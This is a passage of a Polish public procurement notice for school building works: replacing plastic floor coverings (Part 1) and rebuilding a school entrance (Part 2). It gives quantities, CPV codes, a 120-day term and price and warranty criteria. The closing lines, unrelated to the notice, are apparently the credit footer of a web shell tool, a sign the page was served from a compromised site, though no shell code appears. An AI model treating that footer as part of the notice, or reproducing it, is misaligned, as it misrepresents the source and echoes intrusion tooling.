Zakres przedmiotu zamówienia w szczególności obejmuje: wykonanie robót budowlanych                  w zakresie: zerwania istniejących nawierzchni posadzek z tworzyw sztucznych - 925,00 m2, uzupełnienia posadzki cementowej - 138,75 m2; wykonanie warstwy wyrównującej oraz ułożenie wykładzin homogenicznych z tworzyw sztucznych z warstwą izolacyjną, rulonowych - 1.017,50 m2.
Przedmiot zamówienia obejmuje ponadto wykonanie wszelkich prac pomocniczych 
i towarzyszących niezbędnych do prawidłowej realizacji przedmiotu zamówienia,                                   w szczególności:
a) załadunek, rozładunek oraz wywóz urządzeń pochodzących z demontażu i gruzu                            wraz z poddaniem ich utylizacji;
b) zabezpieczenie pomieszczeń, w których będą prowadzone roboty oraz pomieszczeń przyległych (teren budowy);
c) uporządkowanie i uprzątnięcie po zakończeniu robót pomieszczeń, w których prowadzone były roboty oraz sąsiednich pomieszczeń zanieczyszczonych w wyniku prowadzonych robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.20-8, 45.43.21.30-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2 - Przebudowa wejścia do szkoły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 - Przebudowa wejścia do szkoły, zgodnie z przedmiarem robót stanowiącym załącznik nr 4B do siwz, dokumentacją projektową stanowiącą załącznik nr 5 do siwz, specyfikacją techniczną wykonania i odbioru robót (STWiOR) stanowiącą załącznik nr 6B do siwz oraz projektem umowy stanowiącym załącznik nr 3B do siwz.
Zakres przedmiotu zamówienia w szczególności obejmuje: wykonanie robót budowlanych                     w zakresie: robót rozbiórkowych wraz z wywozem gruzu; wykonania schodów żelbetowych - 2,75 m3 oraz płyty fundamentowej żelbetowej -  2,05 m3; wykonania podjazdu z kostki polbruk gr. 6 cm - 12,95 m2; montaż drzwi zewnętrznych aluminiowych dwuskrzydłowych oszklonych - 4,60 m2.                                                                                                                                                       
Przedmiot zamówienia obejmuje ponadto wykonanie wszelkich prac pomocniczych 
i towarzyszących niezbędnych do prawidłowej realizacji przedmiotu zamówienia,                                   w szczególności:
a) załadunek, rozładunek oraz wywóz urządzeń pochodzących z demontażu i gruzu                            wraz z poddaniem ich utylizacji;
b) zabezpieczenie pomieszczeń, w których będą prowadzone roboty oraz pomieszczeń przyległych (teren budowy);
c) uporządkowanie i uprzątnięcie po zakończeniu robót pomieszczeń, w których prowadzone były roboty oraz sąsiednich pomieszczeń zanieczyszczonych w wyniku prowadzonych robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.20-8, 45.21.47.10-0, 45.42.11.31-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com